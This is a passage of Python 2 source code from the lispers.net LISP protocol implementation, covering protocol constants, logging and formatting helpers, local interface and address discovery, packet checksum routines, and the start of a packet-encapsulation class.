LISP_LCAF_INSTANCE_ID_TYPE = 2
LISP_LCAF_ASN_TYPE = 3
LISP_LCAF_APP_DATA_TYPE = 4
LISP_LCAF_GEO_COORD_TYPE = 5
LISP_LCAF_OPAQUE_TYPE = 6
LISP_LCAF_NAT_TYPE = 7
LISP_LCAF_NONCE_LOC_TYPE = 8
LISP_LCAF_MCAST_INFO_TYPE = 9
LISP_LCAF_ELP_TYPE = 10
LISP_LCAF_SECURITY_TYPE = 11
LISP_LCAF_SOURCE_DEST_TYPE = 12
LISP_LCAF_RLE_TYPE = 13
LISP_LCAF_JSON_TYPE = 14
LISP_LCAF_KV_TYPE = 15
LISP_LCAF_ENCAP_TYPE = 16

LISP_MR_TTL = (24 * 60)
LISP_REGISTER_TTL = 3
LISP_SHORT_TTL = 1
LISP_NMR_TTL = 15
LISP_GLEAN_TTL = 15
LISP_MCAST_TTL = 15
LISP_IGMP_TTL = 240

LISP_SITE_TIMEOUT_CHECK_INTERVAL = 60
LISP_PUBSUB_TIMEOUT_CHECK_INTERVAL = 60
LISP_REFERRAL_TIMEOUT_CHECK_INTERVAL = 60
LISP_TEST_MR_INTERVAL = 60
LISP_MAP_NOTIFY_INTERVAL = 2
LISP_DDT_MAP_REQUEST_INTERVAL = 2
LISP_MAX_MAP_NOTIFY_RETRIES = 3
LISP_INFO_INTERVAL = 15
LISP_MAP_REQUEST_RATE_LIMIT = .5
LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME = 60
LISP_ICMP_TOO_BIG_RATE_LIMIT = 1

LISP_RLOC_PROBE_TTL = 128
LISP_RLOC_PROBE_INTERVAL = 10
LISP_RLOC_PROBE_REPLY_WAIT = 15
LISP_DEFAULT_DYN_EID_TIMEOUT = 15
LISP_NONCE_ECHO_INTERVAL = 10
LISP_IGMP_TIMEOUT_INTERVAL = 180
LISP_CS_1024 = 0
LISP_CS_1024_G = 2
LISP_CS_1024_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_2048_CBC = 1
LISP_CS_2048_CBC_G = 2
LISP_CS_2048_CBC_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_25519_CBC = 2
LISP_CS_2048_GCM = 3
LISP_CS_3072 = 4
LISP_CS_3072_G = 2
LISP_CS_3072_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF
LISP_CS_25519_GCM = 5
LISP_CS_25519_CHACHA = 6
LISP_4_32_MASK = 0xFFFFFFFF
LISP_8_64_MASK = 0xFFFFFFFFFFFFFFFF
LISP_16_128_MASK = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
def lisp_record_traceback(*args):
    ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
    fd = open("./logs/lisp-traceback.log", "a")
    fd.write("---------- Exception occurred: {} ----------\n".format(ts))
    try:
        traceback.print_last(file=fd)
    except:
        fd.write("traceback.print_last(file=fd) failed")
    try:
        traceback.print_last()
    except:
        print("traceback.print_last() failed")
    fd.close()
    return

def lisp_set_exception():
    sys.excepthook = lisp_record_traceback
    return
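
# Example (illustrative): a lispers.net process installs the hook once at
# startup so uncaught exceptions are appended to ./logs/lisp-traceback.log
# instead of being lost:
#
#   lisp_set_exception()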

def lisp_is_raspbian():
    if (platform.dist()[0] != "debian"): return (False)
    return (platform.machine() in ["armv6l", "armv7l"])

def lisp_is_ubuntu():
    return (platform.dist()[0] == "Ubuntu")

def lisp_is_fedora():
    return (platform.dist()[0] == "fedora")

def lisp_is_centos():
    return (platform.dist()[0] == "centos")

def lisp_is_debian():
    return (platform.dist()[0] == "debian")

def lisp_is_debian_kali():
    return (platform.dist()[0] == "Kali")

def lisp_is_macos():
    return (platform.uname()[0] == "Darwin")

def lisp_is_alpine():
    return (os.path.exists("/etc/alpine-release"))

def lisp_is_x86():
    machine = platform.machine()
    return (machine in ("x86", "i686", "x86_64"))

def lisp_is_linux():
    return (platform.uname()[0] == "Linux")

def lisp_on_aws():
    bios = commands.getoutput("sudo dmidecode -s bios-version")
    if (bios.find("command not found") != -1 and lisp_on_docker()):
        aws_check = bold("AWS check", False)
        lprint("{} - dmidecode not installed in docker container".format(aws_check))
    return (bios.lower().find("amazon") != -1)

def lisp_on_gcp():
    bios = commands.getoutput("sudo dmidecode -s bios-version")
    return (bios.lower().find("google") != -1)

def lisp_on_docker():
    return (os.path.exists("/.dockerenv"))

def lisp_process_logfile():
    logfile = "./logs/lisp-{}.log".format(lisp_log_id)
    if (os.path.exists(logfile)): return

    sys.stdout.close()
    sys.stdout = open(logfile, "a")

    lisp_print_banner(bold("logfile rotation", False))
    return

def lisp_i_am(name):
    global lisp_log_id, lisp_i_am_itr, lisp_i_am_etr, lisp_i_am_rtr
    global lisp_i_am_mr, lisp_i_am_ms, lisp_i_am_ddt, lisp_i_am_core
    global lisp_hostname

    lisp_log_id = name
    if (name == "itr"): lisp_i_am_itr = True
    if (name == "etr"): lisp_i_am_etr = True
    if (name == "rtr"): lisp_i_am_rtr = True
    if (name == "mr"): lisp_i_am_mr = True
    if (name == "ms"): lisp_i_am_ms = True
    if (name == "ddt"): lisp_i_am_ddt = True
    if (name == "core"): lisp_i_am_core = True

    # Cache the hostname, stripping any domain suffix.
    lisp_hostname = socket.gethostname()
    index = lisp_hostname.find(".")
    if (index != -1): lisp_hostname = lisp_hostname[0:index]
    return
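
# Example (illustrative): the ITR process initializes its identity with
# lisp_i_am("itr"), which sets lisp_log_id to "itr", lisp_i_am_itr to True,
# and caches the domain-stripped hostname in lisp_hostname.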

def lprint(*args):
    force = ("force" in args)
    if (lisp_debug_logging == False and force == False): return

    lisp_process_logfile()
    ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
    ts = ts[:-3]
    print "{}: {}:".format(ts, lisp_log_id),

    for arg in args:
        if (arg == "force"): continue
        print arg,
    print ""

    try: sys.stdout.flush()
    except: pass
    return
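
# Example (illustrative): lprint() honors lisp_debug_logging unless "force"
# is passed as an argument:
#
#   lprint("Map-Request sent to", "192.0.2.1")
#   lprint("fatal condition", "force")   # logged even if debug logging is off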
def dprint(*args):
    if (lisp_data_plane_logging): lprint(*args)
    return
def debug(*args):
    lisp_process_logfile()

    ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
    ts = ts[:-3]

    print red(">>>", False),
    print "{}:".format(ts),
    for arg in args: print arg,
    print red("<<<\n", False)
    try: sys.stdout.flush()
    except: pass
    return
def lisp_print_banner(string):
    global lisp_version, lisp_hostname

    if (lisp_version == ""):
        lisp_version = commands.getoutput("cat lisp-version.txt")

    hostname = bold(lisp_hostname, False)
    lprint("lispers.net LISP {} {}, version {}, hostname {}".format(string,
        datetime.datetime.now(), lisp_version, hostname))
    return
def green(string, html):
    if (html): return('<font color="green"><b>{}</b></font>'.format(string))
    return(bold("\033[92m" + string + "\033[0m", html))
def green_last_sec(string):
    return(green(string, True))
def green_last_min(string):
    return('<font color="#58D68D"><b>{}</b></font>'.format(string))
def red(string, html):
    if (html): return('<font color="red"><b>{}</b></font>'.format(string))
    return(bold("\033[91m" + string + "\033[0m", html))
def blue(string, html):
    if (html): return('<font color="blue"><b>{}</b></font>'.format(string))
    return(bold("\033[94m" + string + "\033[0m", html))
def bold(string, html):
    if (html): return("<b>{}</b>".format(string))
    return("\033[1m" + string + "\033[0m")
def convert_font(string):
    escapes = [["[91m", red], ["[92m", green], ["[94m", blue], ["[1m", bold]]
    end_escape = "[0m"

    #
    # Find the first ANSI begin-escape present and remember which HTML
    # helper renders it.
    #
    for escape in escapes:
        begin_escape = escape[0]
        font_func = escape[1]
        escape_len = len(begin_escape)
        index = string.find(begin_escape)
        if (index != -1): break

    while (index != -1):
        end = string[index::].find(end_escape)
        text = string[index + escape_len:index + end]
        string = string[:index] + font_func(text, True) + \
            string[index + end + escape_len::]
        index = string.find(begin_escape)

    #
    # A bold escape can wrap a color escape, so recurse until none remain.
    #
    if (string.find("[1m") != -1): string = convert_font(string)
    return(string)
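#
# Usage sketch (illustrative only; the function name is hypothetical): text
# built with the ANSI helpers above can be rewritten as HTML for display on
# the web interface.
#
def lisp_example_convert_font_usage():
    ansi = bold("hello", False) + " " + red("world", False)
    return(convert_font(ansi))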
def lisp_space(num):
    output = ""
    for i in range(num): output += "&#160;"
    return(output)
def lisp_button(string, url):
    button = '<button style="background-color:transparent;border-radius:10px;" ' + \
        'type="button">'

    if (url == None):
        html = button + string + "</button>"
    else:
        anchor = '<a href="{}">'.format(url)
        spaces = lisp_space(2)
        html = spaces + anchor + button + string + "</button></a>" + spaces
    return(html)
def lisp_print_cour(string):
    output = '<font face="Courier New">{}</font>'.format(string)
    return(output)
def lisp_print_sans(string):
    output = '<font face="Sans-Serif">{}</font>'.format(string)
    return(output)
def lisp_span(string, hover_string):
    output = '<span title="{}">{}</span>'.format(hover_string, string)
    return(output)
def lisp_eid_help_hover(output):
    eid_help = '''Unicast EID format:
    For longest match lookups:
      <address> or [<iid>]<address>
    For exact match lookups:
      <prefix> or [<iid>]<prefix>
Multicast EID format:
    For longest match lookups:
      <address>-><group> or
      [<iid>]<address>->[<iid>]<group>'''

    hover = lisp_span(output, eid_help)
    return(hover)
def lisp_geo_help_hover(output):
    geo_help = '''EID format:
    <address> or [<iid>]<address>
    '<name>' or [<iid>]'<name>'
Geo-Point format:
    d-m-s-<N|S>-d-m-s-<W|E> or
    [<iid>]d-m-s-<N|S>-d-m-s-<W|E>
Geo-Prefix format:
    d-m-s-<N|S>-d-m-s-<W|E>/<km> or
    [<iid>]d-m-s-<N|S>-d-m-s-<W|E>/<km>'''

    hover = lisp_span(output, geo_help)
    return(hover)
def space(num):
    output = ""
    for i in range(num): output += " "
    return(output)
def lisp_get_ephemeral_port():
    return(random.randrange(32768, 65535))
def lisp_get_data_nonce():
    return(random.randint(0, 0xffffff))
def lisp_get_control_nonce():
    return(random.randint(0, (2**64) - 1))
def lisp_hex_string(integer_value):
    value = hex(integer_value)[2::]
    if (value[-1] == "L"): value = value[0:-1]
    return(value)
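#
# Illustrative note: under Python 2, hex() on a long appends an "L" suffix
# that lisp_hex_string() strips, e.g. hex(2**64 - 1) is "0xffffffffffffffffL"
# but lisp_hex_string(2**64 - 1) returns "ffffffffffffffff".
#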
def lisp_get_timestamp():
    return(time.time())
def lisp_set_timestamp(seconds):
    return(time.time() + seconds)
def lisp_print_elapsed(ts):
    if (ts == 0 or ts == None): return("never")
    elapsed = time.time() - ts
    elapsed = round(elapsed, 0)
    return(str(datetime.timedelta(seconds=elapsed)))
def lisp_print_future(ts):
    if (ts == 0): return("never")
    future = ts - time.time()
    if (future < 0): return("expired")
    future = round(future, 0)
    return(str(datetime.timedelta(seconds=future)))
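#
# Usage sketch (hypothetical function name): the two helpers above format
# timestamps relative to now, so a timer set 30 seconds out prints as a
# countdown ("0:00:30") and a timestamp 90 seconds old prints as elapsed
# time ("0:01:30").
#
def lisp_example_timer_usage():
    future = lisp_set_timestamp(30)
    past = lisp_get_timestamp() - 90
    return(lisp_print_future(future), lisp_print_elapsed(past))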
def lisp_print_eid_tuple(eid, group):
    eid_str = eid.print_prefix()
    if (group.is_null()): return(eid_str)

    group_str = group.print_prefix()
    iid = group.instance_id

    #
    # A null or exact-match source prints as a (*, G) entry.
    #
    if (eid.is_null() or eid.is_exact_match(group)):
        index = group_str.find("]") + 1
        return("[{}](*, {})".format(iid, group_str[index::]))

    sg_str = eid.print_sg(group)
    return(sg_str)
def lisp_convert_6to4(addr_str):
    if (addr_str.find("::ffff:") == -1): return(addr_str)
    addr = addr_str.split(":")
    return(addr[-1])
def lisp_convert_4to6(addr_str):
    addr = lisp_address(LISP_AFI_IPV6, "", 128, 0)
    if (addr.is_ipv4_string(addr_str)): addr_str = "::ffff:" + addr_str
    addr.store_address(addr_str)
    return(addr)
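#
# Usage sketch (hypothetical function name): lisp_convert_4to6() stores an
# IPv4 address in IPv4-mapped IPv6 form and lisp_convert_6to4() recovers the
# dotted-quad string.
#
def lisp_example_mapped_address_usage():
    mapped = lisp_convert_4to6("10.0.0.1")
    return(lisp_convert_6to4("::ffff:10.0.0.1"))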
def lisp_gethostbyname(string):
    ipv4 = string.split(".")
    ipv6 = string.split(":")
    mac = string.split("-")

    #
    # If the string is already an address literal, return it unresolved.
    #
    if (len(ipv4) > 1):
        if (ipv4[0].isdigit()): return(string)

    if (len(ipv6) > 1):
        try:
            int(ipv6[0], 16)
            return(string)
        except:
            pass

    #
    # Check for a dashed MAC address; each of the three pieces must parse
    # as hex.
    #
    if (len(mac) == 3):
        for i in range(3):
            try: int(mac[i], 16)
            except: break

    try:
        addr = socket.gethostbyname(string)
        return(addr)
    except:
        if (lisp_is_alpine() == False): return("")

    #
    # Alpine's resolver needs getaddrinfo(); accept the answer only when the
    # canonical name it returns matches the name asked for.
    #
    try:
        addr = socket.getaddrinfo(string, 0)[0]
        if (addr[3] != string): return("")
        addr = addr[4][0]
    except:
        addr = ""
    return(addr)
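#
# Usage sketch (hypothetical function name; the hostname is made up):
# address literals pass through lisp_gethostbyname() untouched, only names
# trigger a DNS lookup.
#
def lisp_example_gethostbyname_usage():
    literal = lisp_gethostbyname("192.168.1.1")
    name = lisp_gethostbyname("map-server.example.com")
    return(literal, name)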
def lisp_ip_checksum(data, hdrlen=20):
    if (len(data) < hdrlen):
        lprint("IPv4 packet too short, length {}".format(len(data)))
        return(data)

    checksum_data = binascii.hexlify(data)

    #
    # Add up each 16-bit word of the header.
    #
    checksum = 0
    for i in range(0, hdrlen * 2, 4):
        checksum += int(checksum_data[i:i+4], 16)

    #
    # Add in the carry and take the one's complement.
    #
    checksum = (checksum >> 16) + (checksum & 0xffff)
    checksum += checksum >> 16
    checksum = socket.htons(~checksum & 0xffff)

    #
    # Pack into a byte string and insert at bytes 10 and 11 of the header.
    #
    checksum = struct.pack("H", checksum)
    checksum_data = data[0:10] + checksum + data[12::]
    return(checksum_data)
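#
# A minimal sketch (illustrative only; addresses and field values are made
# up, and the function name is hypothetical) of how lisp_ip_checksum() is
# called: build a 20-byte IPv4 header with a zero checksum field and let the
# function fill in bytes 10 and 11.
#
def lisp_example_ip_checksum_usage():
    header = struct.pack("!BBHHHBBH", 0x45, 0, 28, 0, 0, 64, 17, 0)
    header += socket.inet_aton("10.0.0.1") + socket.inet_aton("10.0.0.2")
    return(lisp_ip_checksum(header))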
def lisp_icmp_checksum(data):
    if (len(data) < 36):
        lprint("ICMP packet too short, length {}".format(len(data)))
        return(data)

    icmp = binascii.hexlify(data)

    #
    # Add up each 16-bit word of the 36-byte ICMP message.
    #
    checksum = 0
    for i in range(0, 36, 4):
        checksum += int(icmp[i:i+4], 16)

    #
    # Add in the carry and take the one's complement.
    #
    checksum = (checksum >> 16) + (checksum & 0xffff)
    checksum += checksum >> 16
    checksum = socket.htons(~checksum & 0xffff)

    #
    # Pack into a byte string and insert at bytes 2 and 3 of the ICMP header.
    #
    checksum = struct.pack("H", checksum)
    icmp = data[0:2] + checksum + data[4::]
    return(icmp)
def lisp_udp_checksum(source, dest, data):
    #
    # Build the IPv6 pseudo-header the UDP checksum is computed over:
    # source address, destination address, UDP length, and next-header.
    #
    s = lisp_address(LISP_AFI_IPV6, source, LISP_IPV6_HOST_MASK_LEN, 0)
    d = lisp_address(LISP_AFI_IPV6, dest, LISP_IPV6_HOST_MASK_LEN, 0)
    udp_length = socket.htonl(len(data))
    next_header = socket.htonl(LISP_UDP_PROTOCOL)
    pseudo_header = s.pack_address()
    pseudo_header += d.pack_address()
    pseudo_header += struct.pack("II", udp_length, next_header)

    #
    # Hexlify pseudo-header plus UDP message and pad to a multiple of 4 hex
    # digits (hexlify output is even-length, so the remainder is 0 or 2).
    #
    udp = binascii.hexlify(pseudo_header + data)
    remainder = len(udp) % 4
    for i in range(0, remainder): udp += "0"

    #
    # Add up each 16-bit word.
    #
    checksum = 0
    for i in range(0, len(udp), 4):
        checksum += int(udp[i:i+4], 16)

    #
    # Add in the carry and take the one's complement.
    #
    checksum = (checksum >> 16) + (checksum & 0xffff)
    checksum += checksum >> 16
    checksum = socket.htons(~checksum & 0xffff)

    #
    # Pack into a byte string and insert at bytes 6 and 7 of the UDP header.
    #
    checksum = struct.pack("H", checksum)
    udp = data[0:6] + checksum + data[8::]
    return(udp)
def lisp_igmp_checksum(igmp):
    igmp_hex = binascii.hexlify(igmp)

    #
    # Add up each 16-bit word of the 24-byte IGMP message.
    #
    checksum = 0
    for i in range(0, 24, 4):
        checksum += int(igmp_hex[i:i+4], 16)

    #
    # Add in the carry and take the one's complement.
    #
    checksum = (checksum >> 16) + (checksum & 0xffff)
    checksum += checksum >> 16
    checksum = socket.htons(~checksum & 0xffff)

    #
    # Pack into a byte string and insert at bytes 2 and 3 of the IGMP header.
    #
    checksum = struct.pack("H", checksum)
    igmp = igmp[0:2] + checksum + igmp[4::]
    return(igmp)
def lisp_get_interface_address(device):
    #
    # The device must exist on this system.
    #
    if (device not in netifaces.interfaces()): return(None)

    #
    # It must also have at least one IPv4 address configured.
    #
    addresses = netifaces.ifaddresses(device)
    if (addresses.has_key(netifaces.AF_INET) == False): return(None)

    #
    # Return the first IPv4 address found.
    #
    return_address = lisp_address(LISP_AFI_IPV4, "", 32, 0)

    for addr in addresses[netifaces.AF_INET]:
        addr_str = addr["addr"]
        return_address.store_address(addr_str)
        return(return_address)
    return(None)
def lisp_get_input_interface(packet):
    macs = lisp_format_packet(packet[0:12]).replace(" ", "")
    dest_mac = macs[0:12]
    source_mac = macs[12::]

    try: my_sa = lisp_mymacs.has_key(source_mac)
    except: my_sa = False

    if (lisp_mymacs.has_key(dest_mac)):
        return(lisp_mymacs[dest_mac], source_mac, dest_mac, my_sa)
    if (my_sa): return(lisp_mymacs[source_mac], source_mac, dest_mac, my_sa)
    return(["?"], source_mac, dest_mac, my_sa)
def lisp_get_local_interfaces():
    for device in netifaces.interfaces():
        interface = lisp_interface(device)
        interface.add_interface()
    return
def lisp_get_loopback_address():
    for addr in netifaces.ifaddresses("lo")[netifaces.AF_INET]:
        if (addr["peer"] == "127.0.0.1"): continue
        return(addr["peer"])
    return(None)
def lisp_is_mac_string(mac_str):
    mac = mac_str.split("/")
    if (len(mac) == 2): mac_str = mac[0]
    return(len(mac_str) == 14 and mac_str.count("-") == 2)
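#
# Illustrative note: the dashed MAC format used throughout this file is
# "xxxx-xxxx-xxxx" (14 characters, two dashes), optionally followed by a
# mask length, so for example lisp_is_mac_string("0050-56b7-0a0b") and
# lisp_is_mac_string("0050-56b7-0a0b/48") both return True.
#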
def lisp_get_local_macs():
    for device in netifaces.interfaces():
        #
        # Ignore meta-interfaces; colons and dashes are allowed in device
        # names, anything else non-alphanumeric is skipped. Both replace()
        # calls must chain so the colon stripping is not lost.
        #
        name = device.replace(":", "")
        name = name.replace("-", "")
        if (name.isalnum() == False): continue

        #
        # Some interfaces make netifaces throw; skip them.
        #
        try:
            parms = netifaces.ifaddresses(device)
        except:
            continue

        if (parms.has_key(netifaces.AF_LINK) == False): continue
        mac = parms[netifaces.AF_LINK][0]["addr"]
        mac = mac.replace(":", "")

        #
        # Ignore interfaces with malformed (short) MAC addresses.
        #
        if (len(mac) < 12): continue

        if (lisp_mymacs.has_key(mac) == False): lisp_mymacs[mac] = []
        lisp_mymacs[mac].append(device)

    lprint("Local MACs are: {}".format(lisp_mymacs))
    return
def lisp_get_local_rloc():
    out = commands.getoutput("netstat -rn | egrep 'default|0.0.0.0'")
    if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))

    #
    # Get the device of the default route and list its IPv4 addresses.
    #
    out = out.split("\n")[0]
    device = out.split()[-1]

    addr = ""
    macos = lisp_is_macos()
    if (macos):
        out = commands.getoutput("ifconfig {} | egrep 'inet '".format(device))
        if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
    else:
        cmd = 'ip addr show | egrep "inet " | egrep "{}"'.format(device)
        out = commands.getoutput(cmd)
        if (out == ""):
            cmd = 'ip addr show | egrep "inet " | egrep "global lo"'
            out = commands.getoutput(cmd)
        if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))

    #
    # Take the first address listed on the default-route device; Linux
    # output carries a "/masklen" suffix that must be stripped.
    #
    out = out.split("\n")
    for line in out:
        addr_str = line.split()[1]
        if (macos == False): addr_str = addr_str.split("/")[0]
        address = lisp_address(LISP_AFI_IPV4, addr_str, 32, 0)
        return(address)
    return(lisp_address(LISP_AFI_IPV4, addr, 32, 0))
def lisp_get_local_addresses():
    global lisp_myrlocs

    #
    # The LISP_ADDR_SELECT environment variable can pin the RLOC choice. It
    # is either a device name, an address index (1-based), or
    # "<device>:<index>".
    #
    device_select = None
    address_index = 1
    select = os.getenv("LISP_ADDR_SELECT")
    if (select != None and select != ""):
        select = select.split(":")
        if (len(select) == 2):
            device_select = select[0]
            address_index = select[1]
        else:
            if (select[0].isdigit()):
                address_index = select[0]
            else:
                device_select = select[0]

        address_index = 1 if (address_index == "") else int(address_index)

    rlocs = [None, None, None]
    ipv4 = lisp_address(LISP_AFI_IPV4, "", 32, 0)
    ipv6 = lisp_address(LISP_AFI_IPV6, "", 128, 0)
    iid = None

    for device in netifaces.interfaces():
        if (device_select != None and device_select != device): continue
        addresses = netifaces.ifaddresses(device)
        if (addresses == {}): continue

        #
        # Use the instance-id configured on the interface, if any.
        #
        iid = lisp_get_interface_instance_id(device, None)

        #
        # Select the address_index'th usable IPv4 address, skipping
        # loopback, link-local, zero addresses, and (unless the user pinned
        # a device) addresses covered by a database-mapping EID-prefix.
        #
        if (addresses.has_key(netifaces.AF_INET)):
            ipv4_addresses = addresses[netifaces.AF_INET]
            count = 0
            for addr in ipv4_addresses:
                ipv4.store_address(addr["addr"])
                if (ipv4.is_ipv4_loopback()): continue
                if (ipv4.is_ipv4_link_local()): continue
                if (ipv4.address == 0): continue
                count += 1
                ipv4.instance_id = iid
                if (device_select == None and
                    lisp_db_for_lookups.lookup_cache(ipv4, False)): continue
                rlocs[0] = ipv4
                if (count == address_index): break

        if (addresses.has_key(netifaces.AF_INET6)):
            ipv6_addresses = addresses[netifaces.AF_INET6]
            count = 0
            for addr in ipv6_addresses:
                addr_str = addr["addr"]
                ipv6.store_address(addr_str)
                if (ipv6.is_ipv6_string_link_local(addr_str)): continue
                if (ipv6.is_ipv6_loopback()): continue
                count += 1
                ipv6.instance_id = iid
                if (device_select == None and
                    lisp_db_for_lookups.lookup_cache(ipv6, False)): continue
                rlocs[1] = ipv6
                if (count == address_index): break

        #
        # Keep the first device that produced a usable IPv4 address.
        #
        if (rlocs[0] == None): continue
        rlocs[2] = device
        break

    v4_str = rlocs[0].print_address_no_iid() if rlocs[0] else "none"
    v6_str = rlocs[1].print_address_no_iid() if rlocs[1] else "none"
    device = rlocs[2] if rlocs[2] else "none"

    selected = " (user selected)" if device_select != None else ""

    v4_str = red(v4_str, False)
    v6_str = red(v6_str, False)
    device = bold(device, False)
    lprint("Local addresses are IPv4: {}, IPv6: {} from device {}{}, iid {}".format(v4_str, v6_str, device, selected, iid))

    lisp_myrlocs = rlocs
    return((rlocs[0] != None))
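#
# Operator note (inferred from the code above, not from original
# documentation): LISP_ADDR_SELECT pins the RLOC selection, for example:
#
#   LISP_ADDR_SELECT=eth0     use the first usable address on eth0
#   LISP_ADDR_SELECT=2        use the second usable address on any device
#   LISP_ADDR_SELECT=eth0:2   use the second usable address on eth0
#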
def lisp_get_all_addresses():
    address_list = []
    for interface in netifaces.interfaces():
        try: parms = netifaces.ifaddresses(interface)
        except: continue

        if (parms.has_key(netifaces.AF_INET)):
            for addr in parms[netifaces.AF_INET]:
                a = addr["addr"]
                if (a.find("127.0.0.1") != -1): continue
                address_list.append(a)

        if (parms.has_key(netifaces.AF_INET6)):
            for addr in parms[netifaces.AF_INET6]:
                a = addr["addr"]
                if (a == "::1"): continue
                if (a[0:5] == "fe80:"): continue
                address_list.append(a)

    return(address_list)
def lisp_get_all_multicast_rles():
    rles = []
    out = commands.getoutput('egrep "rle-address =" ./lisp.config')
    if (out == ""): return(rles)

    lines = out.split("\n")
    for line in lines:
        if (line[0] == "#"): continue
        rle = line.split("rle-address = ")[1]
        first_byte = int(rle.split(".")[0])
        if (first_byte >= 224 and first_byte < 240): rles.append(rle)
    return(rles)
class lisp_packet():
    def __init__(self, packet):
        self.outer_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.outer_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.outer_tos = 0
        self.outer_ttl = 0
        self.udp_sport = 0
        self.udp_dport = 0
        self.udp_length = 0
        self.udp_checksum = 0
        self.inner_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.inner_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.inner_tos = 0
        self.inner_ttl = 0
        self.inner_protocol = 0
        self.inner_sport = 0
        self.inner_dport = 0
        self.lisp_header = lisp_data_header()
        self.packet = packet
        self.inner_version = 0
        self.outer_version = 0
        self.encap_port = LISP_DATA_PORT
        self.inner_is_fragment = False
        self.packet_error = ""
        self.gleaned_dest = False
    def encode(self, nonce):
        #
        # If we do not have an outer source address yet, do not encapsulate.
        #
        if (self.outer_source.is_null()): return(None)

        #
        # Encode the LISP data header. A passed-in nonce means we are either
        # echoing a request-nonce or replying with the same nonce.
        #
        if (nonce == None):
            self.lisp_header.nonce(lisp_get_data_nonce())
        elif (self.lisp_header.is_request_nonce(nonce)):
            self.lisp_header.request_nonce(nonce)
        else:
            self.lisp_header.nonce(nonce)
        self.lisp_header.instance_id(self.inner_dest.instance_id)

        #
        # Encrypt the inner packet when lisp-crypto is enabled and a key has
        # been negotiated for the outer RLOC. Instance-id 0xffffff marks
        # control traffic, which is never encrypted.
        #
        self.lisp_header.key_id(0)
        control = (self.lisp_header.get_instance_id() == 0xffffff)
        if (lisp_data_plane_security and control == False):
            addr_str = self.outer_dest.print_address_no_iid() + ":" + \
                str(self.encap_port)
            if (lisp_crypto_keys_by_rloc_encap.has_key(addr_str)):
                keys = lisp_crypto_keys_by_rloc_encap[addr_str]
                if (keys[1]):
                    keys[1].use_count += 1
                    packet, encrypted = self.encrypt(keys[1], addr_str)
                    if (encrypted): self.packet = packet

        #
        # Encode the UDP header. The source port is the crypto ephemeral
        # port if one is configured, else a hash of the inner packet unless
        # the destination was gleaned.
        #
        self.udp_checksum = 0
        if (self.encap_port == LISP_DATA_PORT):
            if (lisp_crypto_ephem_port == None):
                if (self.gleaned_dest):
                    self.udp_sport = LISP_DATA_PORT
                else:
                    self.hash_packet()
            else:
                self.udp_sport = lisp_crypto_ephem_port
        else:
            self.udp_sport = LISP_DATA_PORT

        self.udp_dport = self.encap_port
        self.udp_length = len(self.packet) + 16

        #
        # IPv4 wants the ports and length in network byte order; IPv6 does
        # not byte-swap the ports.
        #
        if (self.outer_version == 4):
            sport = socket.htons(self.udp_sport)
            dport = socket.htons(self.udp_dport)
        else:
            sport = self.udp_sport
            dport = self.udp_dport

        udp = struct.pack("HHHH", sport, dport, socket.htons(self.udp_length),
            self.udp_checksum)

        #
        # Encode the LISP data header.
        #
        lisp = self.lisp_header.encode()

        #
        # Encode the outer IPv4 header with the DF-bit set; for IPv6 the
        # header is prepended by the kernel when sent on a raw socket.
        #
        if (self.outer_version == 4):
            tl = socket.htons(self.udp_length + 20)
            frag = socket.htons(0x4000)
            outer = struct.pack("BBHHHBBH", 0x45, self.outer_tos, tl, 0xdfdf,
                frag, self.outer_ttl, 17, 0)
            outer += self.outer_source.pack_address()
            outer += self.outer_dest.pack_address()
            outer = lisp_ip_checksum(outer)
        elif (self.outer_version == 6):
            outer = ""
        else:
            return(None)

        self.packet = outer + udp + lisp + self.packet
        return(self)
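    #
    # Resulting encapsulation layout produced by encode(), a sketch derived
    # from the code above:
    #
    #   outer IPv4 (20 bytes) | UDP (8) | LISP data header (8) | inner packet
    #
    # which is why udp_length is the inner packet length plus 16.
    #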
    def cipher_pad(self, packet):
        length = len(packet)
        if ((length % 16) != 0):
            pad_length = ((length / 16) + 1) * 16
            packet = packet.ljust(pad_length)
        return(packet)
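    #
    # Illustrative note: cipher_pad() space-pads up to the 16-byte AES block
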